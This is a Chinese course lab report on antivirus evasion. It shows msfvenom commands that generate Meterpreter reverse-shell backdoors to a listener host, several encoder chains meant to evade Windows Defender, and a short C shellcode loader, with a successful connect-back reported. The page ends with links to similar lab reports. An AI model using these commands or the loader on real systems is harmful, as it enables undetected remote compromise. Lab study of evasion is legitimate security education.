1.实验环境

病毒扫描引擎:virustotal.

靶机:windows8.1+windows defender

2.实践内容

2.1 msfvenom

2.1.1 msfvenom直接生成

利用msfvenom直接生成一个后门,上传到virustotal.扫描。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.243 LPORT=443 -f exe > backdoor.31.243.exe

放入主机立刻被windows defender检测隔离。

2.1.2 msfvenom 编码一次

  • 使用命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.31.243 LPORT=443 -f exe > encoded_1.exe

实验结果

2.1.3 msfvenom 编码多次

  • 使用命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.31.243 LPORT=443 -f exe > encoded_10.exe

2.2 Veil_evasion免杀实践

2.3 C语言调用Shellcode

2.3.1Linux平台交叉编译Windows应用

利用指令会生成一个c语言格式的Shellcode数组。

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=443 -f c

编译调用shellcode。

int main()

{

	int(*func)() = (int(*)())buf;

	func();

}

实验结果

2.3.2VisualStudio

  • 实验原理:利用指令会生成一个c语言格式的Shellcode数组。之后利用C语言编程调用shellcode数组,在windows平台生成.exe, 在靶机上运行。
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=443 -f c

与上一个程序用相同的shellcode,将生成的C语言shellcode数组写成win32程序。不同的是此时用到了call函数。

  • 实验结果

    这次结果比上面好,现在尝试能否使用后门回连。



    报错,需要安装vcredist 2013 x86





    回连成功,后门可以使用。

2.3.3动态加密shellcode

对比前两次结果,同一个shellcode被查杀的结果存在差异,很难判断call是否被杀毒软件定义为一个危险行为,下面将同一个shellcode动态加密一下,看看能不能对特征码有没有影响。

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.31.243 LPORT=443 R |msfvenom -e x86/shikata_ga_nai -c 4 -t  raw|msfvenom -e x86/call4_dword_xor -c 3 -t  raw|msfvenom -e x86/context_time -c 3 -t  raw|msfvenom -e x86/jmp_call_additive -c 4 -t   raw|msfvenom -e x86/shikata_ga_nai -c 4 -t exe >  encode_31.243.exe

使用的编码次数太多,虽然达到了免杀效果,但是影响了使用,回连失败。

Exp3:MAL_免杀原理与实践的更多相关文章

  1. 2017-2018 Exp3 MAL_免杀原理与实践 20155214

    目录 Exp3 MAL_免杀原理与实践 实验内容 对msf生成后门程序的检测 Veil-Evasion应用 Visual Studio2017 + shellcode生成后门 主要思路 知识点 最后的 ...

  2. 2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践

    2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践 --------CONTENTS-------- 1. 免杀原理与实践说明 实验说明 基础问题回答 2. 使用msf ...

  3. 2017-2018-2 20155228 《网络对抗技术》 实验三:MAL_免杀原理与实践

    2017-2018-2 20155228 <网络对抗技术> 实验三:MAL_免杀原理与实践 实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasi ...

  4. 2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践

    2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践 一 免杀原理与实践说明 (一).实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件, ...

  5. 20145308 《网络对抗》 MAL_免杀原理及实践 学习总结

    20145308 <网络对抗> MAL_免杀原理及实践 学习总结 实践内容 (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免 ...

  6. 2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践

    2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践 免杀原理及基础问题回答 免杀 1. 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  7. 2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践

    2018-2019-2 20165209 <网络对抗技术>Exp3:免杀原理与实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中 ...

  8. 2017-2018-2 『网络对抗技术』Exp3:免杀原理与实践

    1. 免杀原理与实践说明 一.实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧:(1.5分) ...

  9. 20155229《网络对抗技术》Exp3:免杀原理与实践

    实验预习 免杀: 看为一种能使病毒木马避免被杀毒软件查杀的技术. 免杀的分类: 开源免杀:指在有病毒.木马源代码的前提下,通过修改源代码进行免杀.. 手工免杀:指在仅有病毒.木马的可执行文件(.exe ...

随机推荐

  1. VR论文调研

    IEEE VR 2018 1.Avatars and Virtual Humans--人物和虚拟人物 2.Augmented Reality--增强现实 3.Body and Mind--人体和思想( ...

  2. 用户数以及psp

    小组名称:好好学习 小组成员:林莉  王东涵   胡丽娜   宫丽君 项目名称: 记账本 alpha发布48小时以后用户数如何,是否达到预期目标,为什么,是否需要改进,如何改进(或理性估算). 首先我 ...

  3. pycharm 修改新建文件时的头部模板

    pycharm 修改新建文件时的头部模板 默认为__author__='...' [省略号是默认你的计算机名] 修改这个作者名的步骤: 依次点击:File->Settings->Edito ...

  4. php $_SERVER['HTTP_USER_AGENT']

    //获取浏览器 function getBrowse() { global $_SERVER; $Agent = $_SERVER['HTTP_USER_AGENT']; $browseinfo='' ...

  5. Centos7 FPM 安装mysql8

    参考http://tn.51cto.com/article/647 http://www.jb51.net/article/138787.htm 转载: 卸载centos自带的mariadb rpm ...

  6. 关于request对象的parameter和attribute

    request对象的parameter相关method用于浏览器和服务之间传递数据,且是单向的,只能由浏览器写数据,request读数据,所以只有 String getParameter(String ...

  7. echarts 地图 离线json包分享

    最近,项目中需要用到地图,由于项目的特殊性,只能使用内网获取数据. 然而,echarts官网上的离线地图包(http://echarts.baidu.com/download-map.html)早在一 ...

  8. UVALive6443_Alien Abduction Again

    题意为给你若干个三次函数,以及每一个函数所分布的区间,由于每个函数的所有的系数都是整数,所以最后的函数在整数点处的值也是整数. 现在每次可以插入函数或者询问区间,现在要求每次询问区间后,所有的函数在这 ...

  9. Gauss Prime UVA - 1415

    题意:给出a和b判定是否为高斯素数 解析: 普通的高斯整数i = sqrt(-1) 高斯整数是素数当且仅当: a.b中有一个是零,另一个是形为或其相反数的素数: 或a.b均不为零,而为素数. 这题 提 ...

  10. 【Cf #502 F】The Neutral Zone

    本题把$log$化简之后求得就是每个质数$f$前的系数,求系数并不难,难点在于求出所有的质数. 由于空间限制相当苛刻,$3e8$的$bitset$的内存超限,我们考虑所有的除了$2$和$3$以外的质数 ...